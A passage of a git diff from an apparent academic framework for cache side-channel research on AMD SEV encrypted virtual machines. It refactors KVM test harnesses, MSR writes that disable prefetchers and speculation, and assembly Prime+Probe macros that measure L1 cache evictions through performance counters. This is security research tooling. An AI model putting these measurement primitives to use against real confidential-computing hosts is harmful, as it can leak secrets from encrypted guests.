+		if (count != 1 || cachepc_msrmts[target] != 1) {
 			CPC_ERR("Single eviction %i. test failed (%u vs %u)\n",
 				n, count, 1);
 			if (arg) *arg = count;
 			break;
 		}
-
-		cachepc_save_msrmts(head);
 	}
 
 	if (n == TEST_REPEAT_MAX) {
@@ -253,7 +234,7 @@ cachepc_single_eviction_test(void *p)
 		if (arg) *arg = count;
 	}
 
-	cachepc_release_victim(cachepc_ctx, ptr);
+	cachepc_release_victim(cachepc_ctx, victim);
 }
 
 void
@@ -263,17 +244,11 @@ cachepc_kvm_system_setup(void)
 	 * guessing work was involved, it is likely that one or more of
	 * these operations are not needed */
 
-	// /* disable streaming store */
-	// cachepc_write_msr(0xc0011020, 0, 1ULL << 13);
-
-	// /* disable speculative data cache tlb reloads */
-	// cachepc_write_msr(0xc0011022, 0, 1ULL << 4);
-
-	// /* disable data cache hw prefetchers */
-	// cachepc_write_msr(0xc0011022, 0, 1ULL << 13);
-
-	/* disable inst cache hw prefetchers */
-	cachepc_write_msr(0xc0011021, 0, 1ULL << 13);
+	/* REF: BKDG Family 15h Model 00h-0Fh Rev 3.14 January 23, 2013 P.38 */
+	/* disable streaming store */
+	cachepc_write_msr(0xc0011020, 0, 1ULL << 28);
+	/* disable data cache hw prefetcher */
+	cachepc_write_msr(0xc0011022, 0, 1ULL << 13);
 
 	/* REF: https://arxiv.org/pdf/2204.03290.pdf */
 	/* l1 and l2 prefetchers */
@@ -283,17 +258,13 @@ cachepc_kvm_system_setup(void)
 	/* REF: https://community.amd.com/t5/archives-discussions/modifying-msr-to-disable-the-prefetcher/td-p/143443 */
 	cachepc_write_msr(0xc001102b, 0, 1ULL << 18);
 
-	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.168
-	 * disable L1 and L2 prefetcher */
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.168 */
+	/* disable L1 and L2 prefetcher */
 	cachepc_write_msr(0xC0000108, 0, 0b00101111);
 
-	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.111
-	 * disable speculation */
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.111 */
+	/* disable speculation */
 	cachepc_write_msr(0x00000048, 0, 0b10000111);
-
-	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.175
-	 * disable core performance boost */
-	cachepc_write_msr(0xC0010015, 0, 1ULL << 25);
 }
 
 int
@@ -301,10 +272,7 @@ cachepc_kvm_reset_ioctl(void __user *arg_user)
 {
 	int cpu;
-
 	if (arg_user) return -EINVAL;
-
 	cpu = get_cpu();
-
 	if (cpu != CPC_ISOLCPU) {
 		put_cpu();
 		return -EFAULT;
@@ -357,8 +325,8 @@ cachepc_kvm_test_eviction_ioctl(void __user *arg_user)
 	if (copy_from_user(&u32, arg_user, sizeof(u32)))
 		return -EFAULT;
 
-	ret = smp_call_function_single(2,
-		cachepc_kvm_single_eviction_test, &u32, true);
+	ret = smp_call_function_single(CPC_ISOLCPU,
+		cachepc_single_eviction_test, &u32, true);
 	WARN_ON(ret != 0);
 
 	if (copy_to_user(arg_user, &u32, sizeof(u32)))
@@ -452,19 +420,12 @@ cachepc_kvm_vmsa_read_ioctl(void __user *arg_user)
 int
 cachepc_kvm_svme_read_ioctl(void __user *arg_user)
 {
-	uint32_t lo, hi;
 	uint64_t res;
 	uint32_t svme;
 
 	if (!arg_user) return -EINVAL;
 
-	asm volatile (
-		"rdmsr"
-		: "=a" (lo), "=d" (hi)
-		: "c" (0xC0000080)
-	);
-	res = (((uint64_t) hi) << 32) | (uint64_t) lo;
-
+	res = __rdmsr(0xC0000080);
 	svme = (res >> 12) & 1;
 	if (copy_to_user(arg_user, &svme, sizeof(uint32_t)))
 		return -EFAULT;
@@ -701,20 +662,22 @@ cachepc_kvm_setup_test(void *p)
 
 	cpu = get_cpu();
 
-	CPC_WARN("Running on core %i\n", cpu);
+	CPC_INFO("Running on core %i\n", cpu);
 
 	if (cachepc_verify_topology())
 		goto exit;
 
-	cachepc_ctx = cachepc_get_ctx(L1_CACHE);
+	cachepc_ctx = cachepc_get_ctx();
 	cachepc_ds = cachepc_prepare_ds(cachepc_ctx);
 
+	cachepc_victim = cachepc_prepare_victim(cachepc_ctx, 13);
+
 	cachepc_kvm_system_setup();
 
 	spin_lock_irq(&lock);
-	cachepc_kvm_prime_probe_test();
-	cachepc_kvm_stream_hwpf_test();
-	cachepc_kvm_single_eviction_test(NULL);
+	cachepc_prime_probe_test();
+	cachepc_stream_hwpf_test();
+	cachepc_single_eviction_test(NULL);
 	spin_unlock_irq(&lock);
 
 exit:
@@ -730,6 +693,7 @@ cachepc_kvm_init(void)
 	cachepc_ds = NULL;
 
 	cachepc_debug = false;
+	cachepc_victim = NULL;
 
 	cachepc_retinst = 0;
 	cachepc_singlestep = false;
@@ -751,7 +715,8 @@ cachepc_kvm_init(void)
 
 	cachepc_events_reset();
 
-	ret = smp_call_function_single(2, cachepc_kvm_setup_test, NULL, true);
+	ret = smp_call_function_single(CPC_ISOLCPU,
+		cachepc_kvm_setup_test, NULL, true);
 	WARN_ON(ret != 0);
 }
 
@@ -759,6 +724,8 @@ void
 cachepc_kvm_exit(void)
 {
 	kfree(cachepc_msrmts);
+	kfree(cachepc_baseline);
+	kfree(cachepc_victim);
 
 	if (cachepc_ds)
 		cachepc_release_ds(cachepc_ctx, cachepc_ds);
diff --git a/cachepc/macro.S b/cachepc/macro.S
@@ -0,0 +1,66 @@
+#include "const.h"
+
+# clobbers rax, rbx, rcx, rdx
+.macro barrier
+	lfence # memory barrier
+	rdtsc # compiler barrier
+.endm
+
+# clobbers rax, rbx, rcx, rdx, (out)
+.macro readpmc event out
+	barrier
+
+	mov $0, %rax
+	mov $0, %rdx
+	mov $0xc0010201, %rbx
+	mov \event, %rcx
+	shl $1, %rcx
+	add %rbx, %rcx
+	mov $0, %rbx
+	rdmsr
+	shl $32, %rdx
+	or %rax, %rdx
+	mov %rdx, \out
+
+	barrier
+.endm
+
+# clobbers rax, rbx, rcx, rdx, cl_tmp, (cl_out)
+.macro prime name cl_in cl_tmp cl_out
+	barrier
+
+	mov \cl_in, \cl_tmp
+prime_loop_\name:
+	mov \cl_tmp, \cl_out
+	mov CPC_CL_NEXT_OFFSET(\cl_tmp), \cl_tmp
+	cmp \cl_tmp, \cl_in
+	jne prime_loop_\name
+
+	barrier
+.endm
+
+# clobbers rax, rbx, rcx, rdx, cl_tmp1, cl_tmp2, pmc_tmp, pmc_tmp2
+.macro probe name cl_in cl_tmp1 cl_tmp2 pmc_tmp1 pmc_tmp2
+	barrier
+
+	mov \cl_in, \cl_tmp1
+
+probe_loop_\name:
+	readpmc $CPC_L1MISS_PMC \pmc_tmp1
+
+.rept L1_ASSOC-1
+	mov CPC_CL_PREV_OFFSET(\cl_tmp1), \cl_tmp1
+.endr
+	mov CPC_CL_PREV_OFFSET(\cl_tmp1), \cl_tmp2
+
+	readpmc $CPC_L1MISS_PMC \pmc_tmp2
+
+	sub \pmc_tmp1, \pmc_tmp2
+	mov \pmc_tmp2, CPC_CL_COUNT_OFFSET(\cl_tmp1)
+
+	mov \cl_tmp2, \cl_tmp1
+	cmp \cl_in, \cl_tmp1
+	jne probe_loop_\name
+
+	barrier
+.endm
diff --git a/test/eviction.c b/test/eviction.c
@@ -1,3 +1,4 @@
+#include "test/util.h"
 #include "cachepc/uapi.h"
 
 #include <sys/ioctl.h>
@@ -14,7 +15,7 @@ main(int argc, const char **argv)
 {
 	uint8_t counts[L1_SETS];
 	uint32_t set;
-	int i, fd, ret;
+	int fd, ret;
 
 	fd = open("/dev/kvm", O_RDONLY);
 	if (fd < 0) err(1, "open");
@@ -30,16 +31,9 @@ main(int argc, const char **argv)
 	ret = ioctl(fd, KVM_CPC_READ_COUNTS, counts);
 	if (ret == -1) err(1, "ioctl KVM_CPC_READ_COUNTS");
 
-	for (i = 0; i < 64; i++) {
-		if (i % 16 == 0 && i)
-			printf("\n");
-		if (counts[i] > 0)
-			printf("\x1b[91m");
-		printf("%2i ", i);
-		if (counts[i] > 0)
-			printf("\x1b[0m");
-	}
+	print_counts(counts);
 	printf("\n");
+	print_counts_raw(counts);
 
 	close(fd);
 }
diff --git a/test/kvm-eviction.c b/test/kvm-eviction.c
@@ -139,6 +139,12 @@ main(int argc, const char **argv)
 		}
 	}
 
+	printf("=== Baseline ===\n\n", i);
+	print_counts(baseline);
+	printf("\n");
+	print_counts_raw(baseline);
+	printf("\n");
+
 	/* apply baseline and output samples */
 	for (i = 0; i < SAMPLE_COUNT; i++) {
 		for (k = 0; k < L1_SETS; k++) {
@@ -146,7 +152,7 @@ main(int argc, const char **argv)
 			counts[WITHOUT][i][k] -= baseline[k];
 		}
 
-		printf("\n=== Sample %2i ===\n", i);
+		printf("=== Sample %2i ===\n", i);
 
 		printf("\nWith eviction:\n\n");
 		print_counts(counts[WITH][i]);
@@ -157,6 +163,7 @@ main(int argc, const char **argv)
 		print_counts(counts[WITHOUT][i]);
 		printf("\n");
 		print_counts_raw(counts[WITHOUT][i]);
+		printf("\n");
 	}
 
 	/* check for measurment errors */
@@ -174,7 +181,7 @@ main(int argc, const char **argv)
 		if (!counts[WITH][i][TARGET_SET])
 			warnx("sample %i: Missing eviction in target set %i (=%i,%i)",
 				i, TARGET_SET, counts[WITH][i][TARGET_SET],
-				counts[WITH][i][TARGET_SET] + baseline[i]);
+				counts[WITH][i][TARGET_SET] + baseline[TARGET_SET]);
 	}
 
 	vm_deinit(&vms[WITH]);
diff --git a/test/kvm-eviction_guest.S b/test/kvm-eviction_guest.S
@@ -8,7 +8,7 @@
 .global guest_without_stop
 
 guest_with_start:
-	movq (L1_LINESIZE * (TARGET_SET + L1_SETS)), %rbx
+	mov (L1_LINESIZE * (TARGET_SET + L1_SETS)), %rbx
 	hlt
 	jmp guest_with_start
 guest_with_stop:
diff --git a/test/kvm.c b/test/kvm.c
@@ -203,27 +203,27 @@ snp_dbg_decrypt_rip(int vmfd)
 }
 
 void
-kvm_init(struct kvm *kvm, size_t ramsize,
+kvm_create_vm(struct kvm *kvm)
+{
+	kvm->vmfd = ioctl(kvm_dev, KVM_CREATE_VM, 0);
+	if (kvm->vmfd < 0) err(1, "KVM_CREATE_VM");
+}
+
+void
+kvm_init_memory(struct kvm *kvm, size_t ramsize,
 	void *code_start, void *code_stop)
 {
 	struct kvm_userspace_memory_region region;
-	struct kvm_regs regs;
-	struct kvm_sregs sregs;
 	int ret;
 
-	/* Create a kvm instance */
-	kvm->vmfd = ioctl(kvm_dev, KVM_CREATE_VM, 0);
-	if (kvm->vmfd < 0) err(1, "KVM_CREATE_VM");
-
-	/* Allocate guest memory */
 	kvm->memsize = ramsize;
 	kvm->mem = mmap(NULL, kvm->memsize, PROT_READ | PROT_WRITE,
 		MAP_SHARED | MAP_ANONYMOUS, -1, 0);
-	if (!kvm->mem) err(1, "Allocating guest memory");
+	if (!kvm->mem) err(1, "mmap kvm->mem");
+	memset(kvm->mem, 0, kvm->memsize);
 	assert(code_stop - code_start <= kvm->memsize);
 	memcpy(kvm->mem, code_start, code_stop - code_start);
 
-	/* Map it into the vm */
 	memset(&region, 0, sizeof(region));
 	region.slot = 0;
 	region.memory_size = kvm->memsize;
@@ -231,19 +231,32 @@ kvm_init_memory(struct kvm *kvm, size_t ramsize,
 	region.userspace_addr = (uintptr_t) kvm->mem;
 	ret = ioctl(kvm->vmfd, KVM_SET_USER_MEMORY_REGION, &region);
 	if (ret == -1) err(1, "KVM_SET_USER_MEMORY_REGION");
+}
+
+void
+kvm_create_vcpu(struct kvm *kvm)
+{
+	int ret;
 
-	/* Create virtual cpu core */
 	kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0);
 	if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");
 
-	/* Map the shared kvm_run structure and following data */
 	ret = ioctl(kvm_dev, KVM_GET_VCPU_MMAP_SIZE, NULL);
 	if (ret == -1) err(1, "KVM_GET_VCPU_MMAP_SIZE");
 	if (ret < sizeof(struct kvm_run))
 		errx(1, "KVM_GET_VCPU_MMAP_SIZE too small");
-	kvm->run = mmap(NULL, ret, PROT_READ | PROT_WRITE,
+	kvm->runsize = ret;
+	kvm->run = mmap(NULL, kvm->runsize, PROT_READ | PROT_WRITE,
 		MAP_SHARED, kvm->vcpufd, 0);
-	if (!kvm->run) err(1, "mmap vcpu");
+	if (!kvm->run) err(1, "mmap kvm->run");
+}
+
+void
+kvm_init_regs(struct kvm *kvm)
+{
+	struct kvm_regs regs;
+	struct kvm_sregs sregs;
+	int ret;
 
 	/* Initialize segment regs */
 	memset(&sregs, 0, sizeof(sregs));
@@ -265,72 +278,38 @@ kvm_init_regs(struct kvm *kvm)
 }
 
 void
+kvm_init(struct kvm *kvm, size_t ramsize,
+	void *code_start, void *code_stop)
+{
+	kvm_create_vm(kvm);
+
+	kvm_init_memory(kvm, ramsize, code_start, code_stop);
+
+	kvm_create_vcpu(kvm);
+
+	kvm_init_regs(kvm);
+}
+
+void
 sev_kvm_init(struct kvm *kvm, size_t ramsize,
 	void *code_start, void *code_stop)
 {
-	struct kvm_userspace_memory_region region;
 	struct kvm_sev_launch_update_data update;
 	struct kvm_sev_launch_start start;
-	struct kvm_regs regs;
-	struct kvm_sregs sregs;
 	int ret, fwerr;
 
-	/* Create a kvm instance */
-	kvm->vmfd = ioctl(kvm_dev, KVM_CREATE_VM, 0);
-	if (kvm->vmfd < 0) err(1, "KVM_CREATE_VM");
+	kvm_create_vm(kvm);
 
-	/* Allocate guest memory */
-	kvm->memsize = ramsize;
-	kvm->mem = mmap(NULL, kvm->memsize, PROT_READ | PROT_WRITE,
-		MAP_SHARED | MAP_ANONYMOUS, -1, 0);
-	if (!kvm->mem) err(1, "Allocating guest memory");
-	assert(code_stop - code_start <= kvm->memsize);
-	memcpy(kvm->mem, code_start, code_stop - code_start);
-
-	/* Map it into the vm */
-	memset(&region, 0, sizeof(region));
-	region.slot = 0;
-	region.memory_size = kvm->memsize;
-	region.guest_phys_addr = 0;
-	region.userspace_addr = (uintptr_t) kvm->mem;
-	ret = ioctl(kvm->vmfd, KVM_SET_USER_MEMORY_REGION, &region);
-	if (ret == -1) err(1, "KVM_SET_USER_MEMORY_REGION");
+	kvm_init_memory(kvm, ramsize, code_start, code_stop);
 
 	/* Enable SEV for vm */
 	ret = sev_ioctl(kvm->vmfd, KVM_SEV_INIT, NULL, &fwerr);
 	if (ret == -1) errx(1, "KVM_SEV_INIT: (%s) %s",
 		strerror(errno), sev_fwerr_str(fwerr));
 
-	/* Create virtual cpu core */
-	kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0);
-	if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");
+	kvm_create_vcpu(kvm);
 
-	/* Map the shared kvm_run structure and following data */
-	ret = ioctl(kvm_dev, KVM_GET_VCPU_MMAP_SIZE, NULL);
-	if (ret == -1) err(1, "KVM_GET_VCPU_MMAP_SIZE");
-	if (ret < sizeof(struct kvm_run))
-		errx(1, "KVM_GET_VCPU_MMAP_SIZE too small");
-	kvm->run = mmap(NULL, ret, PROT_READ | PROT_WRITE,
-		MAP_SHARED, kvm->vcpufd, 0);
-	if (!kvm->run) err(1, "mmap vcpu");
-
-	/* Initialize segment regs */
-	memset(&sregs, 0, sizeof(sregs));
-	ret = ioctl(kvm->vcpufd, KVM_GET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_GET_SREGS");
-	sregs.cs.base = 0;
-	sregs.cs.selector = 0;
-	ret = ioctl(kvm->vcpufd, KVM_SET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_SET_SREGS");
-
-	/* Initialize rest of registers */
-	memset(&regs, 0, sizeof(regs));
-	regs.rip = 0;
-	regs.rsp = kvm->memsize - 8;
-	regs.rbp = kvm->memsize - 8;
-	regs.rflags = 0x2;
-	ret = ioctl(kvm->vcpufd, KVM_SET_REGS, &regs);
-	if (ret == -1) err(1, "KVM_SET_REGS");
+	kvm_init_regs(kvm);
 
 	/* Generate encryption keys and set policy */
 	memset(&start, 0, sizeof(start));
@@ -365,69 +344,22 @@ void
 sev_es_kvm_init(struct kvm *kvm, size_t ramsize,
 	void *code_start, void *code_stop)
 {
-	struct kvm_userspace_memory_region region;
 	struct kvm_sev_launch_update_data update;
 	struct kvm_sev_launch_start start;
-	struct kvm_regs regs;
-	struct kvm_sregs sregs;
 	int ret, fwerr;
 
-	/* Create a kvm instance */
-	kvm->vmfd = ioctl(kvm_dev, KVM_CREATE_VM, 0);
-	if (kvm->vmfd < 0) err(1, "KVM_CREATE_VM");
-
-	/* Allocate guest memory */
-	kvm->memsize = ramsize;
-	kvm->mem = mmap(NULL, kvm->memsize, PROT_READ | PROT_WRITE,
-		MAP_SHARED | MAP_ANONYMOUS, -1, 0);
-	if (!kvm->mem) err(1, "Allocating guest memory");
-	assert(code_stop - code_start <= kvm->memsize);
-	memcpy(kvm->mem, code_start, code_stop - code_start);
+	kvm_create_vm(kvm);
 
-	/* Map it into the vm */
-	memset(&region, 0, sizeof(region));
-	region.slot = 0;
-	region.memory_size = kvm->memsize;
-	region.guest_phys_addr = 0;
-	region.userspace_addr = (uintptr_t) kvm->mem;
-	ret = ioctl(kvm->vmfd, KVM_SET_USER_MEMORY_REGION, &region);
-	if (ret == -1) err(1, "KVM_SET_USER_MEMORY_REGION");
+	kvm_init_memory(kvm, ramsize, code_start, code_stop);
 
 	/* Enable SEV for vm */
 	ret = sev_ioctl(kvm->vmfd, KVM_SEV_ES_INIT, NULL, &fwerr);
 	if (ret == -1) errx(1, "KVM_SEV_ES_INIT: (%s) %s",
 		strerror(errno), sev_fwerr_str(fwerr));
 
-	/* Create virtual cpu core */
-	kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0);
-	if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");
-
-	/* Map the shared kvm_run structure and following data */
-	ret = ioctl(kvm_dev, KVM_GET_VCPU_MMAP_SIZE, NULL);
-	if (ret == -1) err(1, "KVM_GET_VCPU_MMAP_SIZE");
-	if (ret < sizeof(struct kvm_run))
-		errx(1, "KVM_GET_VCPU_MMAP_SIZE too small");
-	kvm->run = mmap(NULL, ret, PROT_READ | PROT_WRITE,
-		MAP_SHARED, kvm->vcpufd, 0);
-	if (!kvm->run) err(1, "mmap vcpu");
-
-	/* Initialize segment regs */
-	memset(&sregs, 0, sizeof(sregs));
-	ret = ioctl(kvm->vcpufd, KVM_GET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_GET_SREGS");
-	sregs.cs.base = 0;
-	sregs.cs.selector = 0;
-	ret = ioctl(kvm->vcpufd, KVM_SET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_SET_SREGS");
+	kvm_create_vcpu(kvm);
 
-	/* Initialize rest of registers */
-	memset(&regs, 0, sizeof(regs));
-	regs.rip = 0;
-	regs.rsp = kvm->memsize - 8;
-	regs.rbp = kvm->memsize - 8;
-	regs.rflags = 0x2;
-	ret = ioctl(kvm->vcpufd, KVM_SET_REGS, &regs);
-	if (ret == -1) err(1, "KVM_SET_REGS");
+	kvm_init_regs(kvm);
 
 	/* Generate encryption keys and set policy */
 	memset(&start, 0, sizeof(start));
@@ -470,33 +402,13 @@ sev_snp_kvm_init(struct kvm *kvm, size_t ramsize,
 	struct kvm_sev_snp_launch_update update;
 	struct kvm_sev_snp_launch_start start;
 	struct kvm_sev_snp_launch_finish finish;
-	struct kvm_snp_init init;
-	struct kvm_userspace_memory_region region;
 	struct kvm_enc_region enc_region;
-	struct kvm_sregs sregs;
-	struct kvm_regs regs;
+	struct kvm_snp_init init;
 	int ret, fwerr;
 
-	/* Create a kvm instance */
-	kvm->vmfd = ioctl(kvm_dev, KVM_CREATE_VM, 0);
-	if (kvm->vmfd < 0) err(1, "KVM_CREATE_VM");
-
-	/* Allocate guest memory */
-	kvm->memsize = ramsize;
-	kvm->mem = mmap(NULL, kvm->memsize, PROT_READ | PROT_WRITE,
-		MAP_SHARED | MAP_ANONYMOUS, -1, 0);
-	if (!kvm->mem) err(1, "Allocating guest memory");
-	assert(code_stop - code_start <= kvm->memsize);
-	memcpy(kvm->mem, code_start, code_stop - code_start);
+	kvm_create_vm(kvm);
 
-	/* Map it into the vm */
-	memset(&region, 0, sizeof(region));
-	region.slot = 0;
-	region.memory_size = kvm->memsize;
-	region.guest_phys_addr = 0;
-	region.userspace_addr = (uintptr_t) kvm->mem;
-	ret = ioctl(kvm->vmfd, KVM_SET_USER_MEMORY_REGION, &region);
-	if (ret == -1) err(1, "KVM_SET_USER_MEMORY_REGION");
+	kvm_init_memory(kvm, ramsize, code_start, code_stop);
 
 	/* Enable SEV for vm */
 	memset(&init, 0, sizeof(init));
@@ -511,35 +423,9 @@ sev_snp_kvm_init(struct kvm *kvm, size_t ramsize,
 	ret = ioctl(kvm->vmfd, KVM_MEMORY_ENCRYPT_REG_REGION, &enc_region);
 	if (ret == -1) err(1, "KVM_MEMORY_ENCRYPT_REG_REGION");
 
-	/* Create virtual cpu */
-	kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0);
-	if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");
+	kvm_create_vcpu(kvm);
 
-	/* Map the shared kvm_run structure and following data */
-	ret = ioctl(kvm_dev, KVM_GET_VCPU_MMAP_SIZE, NULL);
-	if (ret == -1) err(1, "KVM_GET_VCPU_MMAP_SIZE");
-	if (ret < sizeof(struct kvm_run))
-		errx(1, "KVM_GET_VCPU_MMAP_SIZE too small");
-	kvm->run = mmap(NULL, ret, PROT_READ | PROT_WRITE,
-		MAP_SHARED, kvm->vcpufd, 0);
-	if (!kvm->run) err(1, "mmap vcpu");
-
-	/* Initialize segment regs */
-	memset(&sregs, 0, sizeof(sregs));
-	ret = ioctl(kvm->vcpufd, KVM_GET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_GET_SREGS");
-	sregs.cs.base = 0;
-	sregs.cs.selector = 0;
-	ret = ioctl(kvm->vcpufd, KVM_SET_SREGS, &sregs);
-	if (ret == -1) err(1, "KVM_SET_SREGS");
-
-	/* Initialize rest of registers */
-	memset(&regs, 0, sizeof(regs));
-	regs.rip = 0;
-	regs.rsp = kvm->memsize - 8 - L1_LINESIZE * L1_SETS;
-	regs.rbp = kvm->memsize - 8 - L1_LINESIZE * L1_SETS;
-	ret = ioctl(kvm->vcpufd, KVM_SET_REGS, &regs);
-	if (ret == -1) err(1, "KVM_SET_REGS");
+	kvm_init_regs(kvm);
 
 	/* Generate encryption keys and set policy */
 	memset(&start, 0, sizeof(start));
@@ -573,6 +459,7 @@ kvm_deinit(struct kvm *kvm)
 	close(kvm->vmfd);
 	close(kvm->vcpufd);
 	munmap(kvm->mem, kvm->memsize);
+	munmap(kvm->run, kvm->runsize);
 }
 
 void
diff --git a/test/kvm.h b/test/kvm.h
@@ -18,7 +18,7 @@ enum {
 struct kvm {
 	int fd, vmfd, vcpufd;
 	void *mem;
-	size_t memsize;
+	size_t memsize, runsize;
 	struct kvm_run *run;
 };